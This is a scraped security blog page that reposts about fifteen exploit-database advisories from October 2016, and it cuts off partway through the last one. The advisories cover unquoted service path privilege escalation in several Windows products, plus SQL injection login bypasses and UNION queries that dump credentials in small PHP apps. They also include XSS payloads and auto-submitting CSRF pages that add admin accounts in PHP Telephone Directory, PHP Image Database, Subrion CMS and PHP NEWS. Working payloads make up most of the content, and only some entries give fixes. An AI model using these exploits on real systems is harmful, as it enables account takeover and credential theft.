# Exploit Title: Graylog Collector Service Path Privilege Escalation
# Date: 10/14/2016
# Exploit Author: Joey Lane
# Software Link: https://github.com/Graylog2/collector
# Version: 0.4.2
# Tested on: Windows Server 2012 R2
Graylog Collector installs as a service with an unquoted service path. If
the user installs this service in a directory containing a space, this will
create a privilege escalation vulnerability. To properly exploit this
vulnerability, a local attacker can insert an executable file in the path
of the service. Rebooting the system or restarting the service will run
the malicious executable with elevated privileges.
This was tested on version 0.4.2, but may affect other versions as well.
---------------------------------------------------------------------------
C:\sc qc GraylogCollector
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: GraylogCollector
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\graylog collector\bin\windows\graylog-collector-service-x86.exe //RS//GraylogCollector
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Graylog Collector (GraylogCollector)
DEPENDENCIES : Tcpip
: Afd
SERVICE_START_NAME : LocalSystem
---------------------------------------------------------------------------
EXAMPLE:
Using the BINARY_PATH_NAME listed above as an example, an executable named
"graylog.exe" could be placed in "C:\", and it would be executed as the
Local System user next time the service was restarted.
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863291408
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#########################################################################
# Exploit Title: NETGATE Registry Cleaner Unquoted Service Path Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.netgate.sk/
# Software Link: http://www.netgate.sk/download/download.php?id=4
# Version : build 16.0.205 (Latest)
# Tested on: Windows 7
##########################################################################
NETGATE Registry Cleaner installs a service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc NGRegClnSrv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: NGRegClnSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Registry
Cleaner\RegistryCleanerSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NETGATE Registry Cleaner Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title............... Student Information System (SIS) Auth Bypass
# Google Dork................. N/A
# Date........................ 14/10/2016
# Exploit Author.............. lahilote
# Vendor Homepage............. http://www.sourcecodester.com/php/10902/student-information-system-sis.html
# Software Link............... http://www.sourcecodester.com/sites/default/files/download/Bwire%20Charles/ucc.zip
# Version..................... 0.1
# Tested on................... xampp
# CVE......................... N/A
The audit_list in ucc/admin_login.php
-------------------------------------
----snip----
error_reporting(E_ALL ^ E_DEPRECATED);
if(isset($_POST['submit'])) {
include 'database_config2.php';
$myusername = $_POST['username'];
$mypassword = $_POST['password'];
$query = "SELECT * FROM adminstrator WHERE USERNAME='$myusername' and PASSWORD='$mypassword'";
$result = mysql_query($query);
$count = mysql_num_rows($result);
mysql_close();
----snip----
You can login with username and password: admin' or '1'='1
How to fix
----------
One of the method's to fix and secure such Auth Bypass flaw's, is to use the php function mysql_real_escape_string.
It causes that every of this characters \x00, \n, \r, \, '
get's replaced with a simple Backslash „/“, so the attackers commands become useless.
Example:
error_reporting(E_ALL ^ E_DEPRECATED);
if(isset($_POST['submit'])) {
include 'database_config2.php';
$myusername = mysql_real_escape_string($_POST['username']);
$mypassword = mysql_real_escape_string($_POST['password']);
$query = "SELECT * FROM adminstrator WHERE USERNAME='$myusername' and PASSWORD='$mypassword'";
$result = mysql_query($query);
$count = mysql_num_rows($result);
mysql_close();
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/10902/student-information-system-sis.html
http://php.net/manual/en/function.mysql-real-escape-string.php
#########################################################################
# Exploit Title: NETGATE Data Backup Unquoted Service Path Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.netgate.sk/
# Software Link:
http://www.netgate.sk/download/download.php?id=5
#version : build 3.0.605 (Latest)
# Tested on: Windows 7
##########################################################################
NETGATE Data Backup installs a service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc NGDatBckpSrv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: NGDatBckpSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Data
Backup\DataBackupSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NETGATE Data Backup Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#########################################################################
# Exploit Title: NETGATE AMITI Antivirus Unquoted Service Path Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.netgate.sk/
# Software Link: http://www.netgate.sk/download/download.php?id=11
# Version : build 23.0.305 (Latest)
# Tested on: Windows 7
##########################################################################
AMITI Antivirus installs two service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc AmitiAvSrv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AmitiAvSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti
Antivirus\AmitiAntivirusSrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Amiti Antivirus Engine Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>sc qc AmitiAvHealth
[SC] QueryServiceConfig SUCCESS
----------------------------------------------------
SERVICE_NAME: AmitiAvHealth
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Amiti
Antivirus\AmitiAntivirusHealth.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Amiti Antivirus Health Check
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title.............. Web Based Alumni Tracking System Multiple Vulnerability
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/php/10832/web-based-alumni-tracking-system.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/John%20Mark%20Ulep/web-based_alumni_tracking_system.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in /admin/print_employed.php
-------------------------------
----snip----
48 <?php $get_id = $_GET['id'];?>
----snip----
/admin/index.php
----------------
----snip----
$user = $_POST['username'];
$password = $_POST['password'];
$myquery = mysql_query("select * from user where username = '$user' and password = '$password'")or die(mysql_error());
----snip----
Example exploitation
--------------------
http://server/path_to_webapp/admin/print_employed.php?id=-2%27%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12%20from%20user--+
http://server/path_to_webapp/admin/index.php
Login with username and password: admin' or '1'='1
How to fix
----------
Simple method's use the php function intval and mysql_real_escape_string.
Example: /admin/print_employed.php
48 <?php $get_id = intval($_GET['id']);?>
Example: /admin/index.php
$user = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
$myquery = mysql_query("select * from user where username = '$user' and password = '$password'")or die(mysql_error());
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/10832/web-based-alumni-tracking-system.html
http://php.net/manual/en/function.intval.php
http://php.net/manual/en/function.mysql-real-escape-string.php
# Exploit Title.............. Simple Dynamic Web SQL Injection
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/php/10888/simple-dynamic-web-site.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/Chinthaka%20Deshapriya/dynamic_web_page.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in /page.php
----snip----
$prodID = $_GET['prodid'];
if(!empty($prodID)){
$sqlSelectSpecProd = mysql_query("select * from page where id = '$prodID'") or die(mysql_error());
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
$ptitle = $getProdInfo["title"];
$pdes = $getProdInfo["description"];
$pimg = $getProdInfo["imgUrl"];
}
----snip----
Example exploitation
--------------------
http://server/path_to_webapp/page.php?prodid=-3%27%20union%20select%201,2,@@version,4--+
How to fix
----------
Simple method's use the php function intval.
For example
$prodID = intval($_GET['prodid']);
if(!empty($prodID)){
$sqlSelectSpecProd = mysql_query("select * from page where id = '$prodID'") or die(mysql_error());
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
$ptitle = $getProdInfo["title"];
$pdes = $getProdInfo["description"];
$pimg = $getProdInfo["imgUrl"];
}
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/10888/simple-dynamic-web-site.html
http://php.net/manual/en/function.intval.php
# Exploit Title.............. Learning Management System Auth Bypass
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/php/7339/learning-management-system.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/jkev/lms.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in lms/login.php
-------------------------------
----snip----
$username = $_POST['username'];
$password = $_POST['password'];
/* student */
$query = "SELECT * FROM student WHERE username='$username' AND password='$password'";
$result = mysql_query($query)or die(mysql_error());
$row = mysql_fetch_array($result);
$num_row = mysql_num_rows($result);
/* teacher */
$query_teacher = mysql_query("SELECT * FROM teacher WHERE username='$username' AND password='$password'")or die(mysql_error());
$num_row_teacher = mysql_num_rows($query_teacher);
$row_teahcer = mysql_fetch_array($query_teacher);
if( $num_row > 0 ) {
----snip----
lms/admin/login.php
-------------------
----snip----
$username = $_POST['username'];
$password = $_POST['password'];
$query = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'")or die(mysql_error());
$count = mysql_num_rows($query);
$row = mysql_fetch_array($query);
----snip----
You can login with username and password: admin' or '1'='1
How to fix
----------
One of the method's to fix and secure such Auth Bypass flaw's, is to use the php function mysql_real_escape_string.
It causes that every of this characters \x00, \n, \r, \, '
get's replaced with a simple Backslash „/“, so the attackers commands become useless.
Example: lms/login.php
$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
/* student */
$query = "SELECT * FROM student WHERE username='$username' AND password='$password'";
$result = mysql_query($query)or die(mysql_error());
$row = mysql_fetch_array($result);
$num_row = mysql_num_rows($result);
/* teacher */
$query_teacher = mysql_query("SELECT * FROM teacher WHERE username='$username' AND password='$password'")or die(mysql_error());
$num_row_teacher = mysql_num_rows($query_teacher);
$row_teahcer = mysql_fetch_array($query_teacher);
if( $num_row > 0 ) {
Example: lms/admin/login.php
$username = mysql_real_escape_string($_POST['username']);
$password = mysql_real_escape_string($_POST['password']);
$query = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'")or die(mysql_error());
$count = mysql_num_rows($query);
$row = mysql_fetch_array($query);
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/7339/learning-management-system.html
http://php.net/manual/en/function.mysql-real-escape-string.php
# Exploit Title.............. Fashion Shopping Cart SQL Injection
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/node/10435
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/aniketsmarty/online_shopping.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in /admin/dd.php
-------------------------------
----snip----
$q=$_GET["q"];
$sql="SELECT * FROM subcategory WHERE cat_id ='$q'";
----snip----
Example exploitation
--------------------
http://server/path_to_webapp/admin/dd.php?q=-1%27%20union%20select%201,version()--+
How to fix
----------
Simple method's use the php function intval.
For example
$q=intval($_GET["q"]);
$sql="SELECT * FROM subcategory WHERE cat_id ='$q'";
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/node/10435
http://php.net/manual/en/function.intval.php
# Exploit Title.............. Health Record System Auth Bypass
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/node/10430
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/Jesutoyeboluwatife/vital.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in vital/signin.php
-------------------------------
----snip----
if (isset($_POST['submit'])){
$lga_id=$_POST['lgaid'];
$pw=$_POST['pwd'];
$_SESSION['username'] = $lga_id;
$sql=mysql_query("SELECT * FROM admin WHERE lga_id='$lga_id' AND password='$pw' ");
----snip----
You can login with username and password: admin' or '1'='1
How to fix
----------
One of the method's to fix and secure such Auth Bypass flaw's, is to use the php function mysql_real_escape_string.
It causes that every of this characters \x00, \n, \r, \, '
get's replaced with a simple Backslash „/“, so the attackers commands become useless.
Example:
if (isset($_POST['submit'])){
$lga_id=mysql_real_escape_string($_POST['lgaid']);
$pw=mysql_real_escape_string($_POST['pwd']);
$_SESSION['username'] = $lga_id;
$sql=mysql_query("SELECT * FROM admin WHERE lga_id='$lga_id' AND password='$pw' ");
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/node/10430
http://php.net/manual/en/function.mysql-real-escape-string.php
#########################################################################
# Exploit Title: Spy Emergency Unquoted Service Path Privilege Escalation
# Date: 15/10/2016
# Author: Amir.ght
# Vendor Homepage: http://www.spy-emergency.com/
# Software Link: http://www.spy-emergency.com/download/download.php?id=1
#version : build 23.0.205 (Latest)
# Tested on: Windows 7
##########################################################################
Spy Emergency installs two service with an unquoted service path
To properly exploit this vulnerability,
the local attacker must insert an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc SpyEmrgHealth
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SpyEmrgHealth
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Spy
Emergency\SpyEmergencyHealth.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Spy Emergency Health Check
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
------------------------------------------------------------------
C:\>sc qc SpyEmrgSrv
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SpyEmrgSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\NETGATE\Spy
Emergency\SpyEmergencySrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Spy Emergency Engine Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
# Exploit Title: PHP Telephone Directory - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=2
# Software Link: http://www.pagereactions.com/downloads/phptelephonedirectory.zip
---------------------------------------------------------------------------------
POC as follows :
# 0x00 Reflected XSS
---
1.In public search :
http://192.168.1.112/phptelephonedirectory/index.php?key=<svg/onload=alert(1)>
2.In administration web interface (need normal user login) :
http://192.168.1.112/phptelephonedirectory/administration.php?key=<svg/onload=alert(1)>
# 0x01 Stored XSS
---
1.In administration web directory interface (need normal user login) :
http://192.168.1.112/phptelephonedirectory/administration.php
?pageaction=newcontact
&subaction=submit
&id=1
&dtDOBDate=0000-00-00
&pointcode=<script>alert(1)/*
&contacttitle=*/</script>
&firstname=<script>alert(2)</script>
&lastname=<script>alert(3)</script>
&middlename=<script>alert(4)</script>
&DOBdateradio=usenew
&dateday=16
&datemonthnewedit=10
&dateyearnewedit=2015
&employeeID=<script>alert(5)/*
&otherID=*/</script>
&phonenumber1=<script>alert(6)</script>
&internalphonenumber=<script>alert(7)</script>
&phonenumber2=<script>alert(8)</script>
&phonenumber3=<script>alert(9)</script>
&fax=<script>alert(10)</script>
&mobilecell=<script>alert(11)</script>
&email=<script>alert(12)</script>
&alternateemail=<script>alert(13)</script>
&chat=<script>alert(14)</script>
&website=<script>alert(15)</script>
&socialmedia1=<script>alert(16)</script>
&socialmedia2=<script>alert(17)</script>
&socialmedia3=<script>alert(18)</script>
&contactposition=<script>alert(19)</script>
&company=<script>alert(20)</script>
&qualifications=<script>alert(21)</script>
&departmentnewedit=
&buildingroom=<script>alert(22)</script>
&address=<script>alert(23)</script>
&city=<script>alert(24)</script>
&suburb=<script>alert(25)</script>
&tdstate=<script>alert(26)</script>
&zippostcode=<script>alert(27)/*
&country=*/</script><script>alert(28)</script>
&description=<script>alert(29)</script>
&recordstatus=active
2.In administration web department interface (need normal user login) :
http://192.168.1.112/phptelephonedirectory/administration.php?pageaction=newdepartment&subaction=submit&departmentname=</select><svg/onload=alert(1)><select>
# 0x02 CSRF (add Super user)
---
In http://192.168.1.103/csrf.html :
<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.112/phptelephonedirectory/administration.php" method="POST">
<input name="pageaction" value="saveuser" type="hidden" />
<input name="subaction" value="submit" type="hidden" />
<input name="username" value="larry_csrf" type="hidden" />
<input name="password" value="larry_csrf" type="hidden" />
<input name="userfullname" value="larry_csrf" type="hidden" />
<input name="accesslevel" value="Super" type="hidden" />
<input name="userstatus" value="active" type="hidden" />
<input name="mysubmit" value="submit" type="submit" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
* Thanks to Besim *
# Exploit Title: Subrion CMS 4.0.5 - CSRF Bypass to Persistent XSS and Add-Admin
# Date: 15-10-2016
# Software Link: http://www.subrion.org/download/
# Vendor: http://www.subrion.org
# Google Dork: "Powered by Subrion CMS"
# Exploit Author: Ahsan Tahir
# Contact: https://twitter.com/AhsanTahirAT | https://facebook.com/ahsantahiratofficial
# Website: www.ahsantahir.net
# Category: webapps
# Version: 4.0.5
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com
[+] CSRF bypass to Persistent XSS
1. Description
There was an Anti-CSRF token while adding a post in Subrion CMS v4.0.5, named with paramater '__st', but it can be bypassed if we enter
the same number of characters in the CSRF token (for e.g XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX), then the CSRF protection will be bypassed
means, if we craft a malicious HTML web page, we can trick the admin/vicitm to visit a website, and after he/she visits the website,
a blog post will be created with a tag like this: "</title><script>alert(document.domain);</script>" and now the XSS can be executed
here: http://localhost/[SubrionPATH]/tag/title-script-alert-document-domain-script/
2. Proof of Concept (CSRF to Persistent XSS)
Login to your subrion CMS as admin, visit a webpage with the below HTML code, and click on submit request, a new post named
"Hacked by Ahsan" will be created, with a tag "</title><script>alert(document.domain);</script>", means that we exploited
CSRF sucessfully!
XSS will execute here: http://localhost/[SubrionPATH]/tag/title-script-alert-document-domain-script/
[!] PoC Code:
<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/subi/admin/blog/add/", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------292766351574");
xhr.withCredentials = true;
var body = "-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"__st\"\r\n" +
"\r\n" +
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"title\"\r\n" +
"\r\n" +
"Hacked by Ahsan Tahir\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"alias\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"body\"\r\n" +
"\r\n" +
"\x3cp\x3eHacked by Ahsan Tahir\x3c/p\x3e\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"tags\"\r\n" +
"\r\n" +
"\x3c/title\x3e\x3cscript\x3ealert(document.domain);\x3c/script\x3e\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"v[image]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"image\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"owner\"\r\n" +
"\r\n" +
"Administrator (emailofadmin@gmail.com)\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"member_id\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"date_added\"\r\n" +
"\r\n" +
"2016-10-15 04:41\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"status\"\r\n" +
"\r\n" +
"active\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"save\"\r\n" +
"\r\n" +
"Add\r\n" +
"-----------------------------292766351574\r\n" +
"Content-Disposition: form-data; name=\"goto\"\r\n" +
"\r\n" +
"list\r\n" +
"-----------------------------292766351574--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
----------------------------------------------------------------------------------------------------------------------
[+] Add-Admin CSRF
1. Description
There was an Anti-CSRF token while adding an admin in Subrion CMS v4.0.5, named with paramater '__st', but it can be bypassed if we enter
the same number of characters in the CSRF token (for e.g XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX), then the CSRF protection will be bypassed
means, if we craft a malicious HTML web page, we can trick the admin/vicitm to visit a website, and after he/she visits the website,
a new admin will be created with an email which is controled by attacker, means now the attacker have full administration over the
Subrion CMS Blog!
2. Proof of Concept
Login to your subrion CMS as admin, visit a webpage with the below HTML code, and click on submit request, a new admin named
"Haxor" will be created, with email "ahsan@ahsan.py", means that we exploited the CSRF sucessfully, and now the attacker
has full control over the subrion blog!
[!] PoC Code:
<html>
<!-- CSRF PoC -->
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/subi/admin/members/add/", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------2573679013209");
xhr.withCredentials = true;
var body = "-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"__st\"\r\n" +
"\r\n" +
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"username\"\r\n" +
"\r\n" +
"haxor\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"fullname\"\r\n" +
"\r\n" +
"Craxor\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"email\"\r\n" +
"\r\n" +
"ahsan@ahsan.py\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"_password\"\r\n" +
"\r\n" +
"ahsan123\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"_password2\"\r\n" +
"\r\n" +
"ahsan123\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"usergroup_id\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"v[avatar[]]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"website\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"phone\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"biography\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"facebook\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"twitter\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"gplus\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"linkedin\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"sponsored\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"featured\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"featured_end\"\r\n" +
"\r\n" +
"2016-11-15 04:54\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"status\"\r\n" +
"\r\n" +
"active\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"save\"\r\n" +
"\r\n" +
"Add\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"goto\"\r\n" +
"\r\n" +
"list\r\n" +
"-----------------------------2573679013209--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
Credits & Authors:
==================
Ahsan Tahir - [https://twitter.com/AhsanTahirAT]
# Exploit Title: PHP Image Database - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=3
# Software Link: http://www.pagereactions.com/downloads/phpimagedatabase.zip
----------------------------------------------------------------------------
POC as follows :
# 0x00 Reflected XSS
---
1.In public search :
http://192.168.1.112/phpimagedatabase/index.php?dateyear=<svg/onload=alert(1)>&key=<svg/onload=alert(2)>
2.In administration web interface (need normal user login) :
http://192.168.1.112/phpimagedatabase/administration.php?dateyear=<svg/onload=alert(1)>&key=<svg/onload=alert(2)>
# 0x01 Stored XSS
---
1.In administration web images interface (need normal user login) :
http://192.168.1.112/phpimagedatabase/administration.php
?pageaction=newimage
&MAX_FILE_SIZE=1000000
&subaction=submit
&dateday=16
&datemonthnewedit=10
&dateyearnewedit=2016
&title=<svg/onload=alert(1)>
&caption=<svg/onload=alert(2)>
&keywordtags=<svg/onload=alert(3)>
&photographer=<svg/onload=alert(4)>
&categorynewedit=
&publish=active
2.In administration web categories interface (need administrator user login) :
http://192.168.1.112/phpimagedatabase/administration.php?pageaction=newcategory&subaction=submit&categoryname=</select><svg/onload=alert(1)><select>
# 0x02 CSRF (add Super user)
---
In http://192.168.1.103/csrf.html :
<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.112/phpimagedatabase/administration.php" method="POST">
<input name="pageaction" value="saveuser" type="hidden" />
<input name="subaction" value="submit" type="hidden" />
<input name="username" value="larry_csrf" type="hidden" />
<input name="password" value="larry_csrf" type="hidden" />
<input name="userfullname" value="larry_csrf" type="hidden" />
<input name="accesslevel" value="Super" type="hidden" />
<input name="userstatus" value="active" type="hidden" />
<input name="mysubmit" value="submit" type="submit" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
* Thanks to Besim *
*=========================================================================================================
# Exploit Title: PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)
# Author: Meryem AKDOĞAN
# Google Dork: -
# Date: 16/10/2016
# Type: webapps
# Platform : PHP
# Vendor Homepage: http://newsphp.sourceforge.net
# Software Link: https://sourceforge.net/projects/newsphp/
# Version: 1.3.0
*=========================================================================================================
DETAILS
========================================
PHP NEWS 1.3.0 versions is vulnerable to CSRF attack (No CSRF token in
place) meaning that if an admin user can be tricked to visit a crafted URL
created
by attacker (via spear phishing/social engineering), a form will be
submitted to (http://sitename/path/index.php) that will change admin
password.
Once exploited, the attacker can login to the admin panel using the
username and the password he posted in the form.
RISK
========================================
Attacker can change admin password with this vulnerablity
TECHNICAL DETAILS & POC
========================================
<html>
<!— CSRF PoC —>
<body>
<form action="
http://site_name/phpnews/index.php?action=modifynewsposter3" method="POST">
<input type="hidden" name="id" value="7" />
<input type="hidden" name="newusername" value="meryem akdogan" />
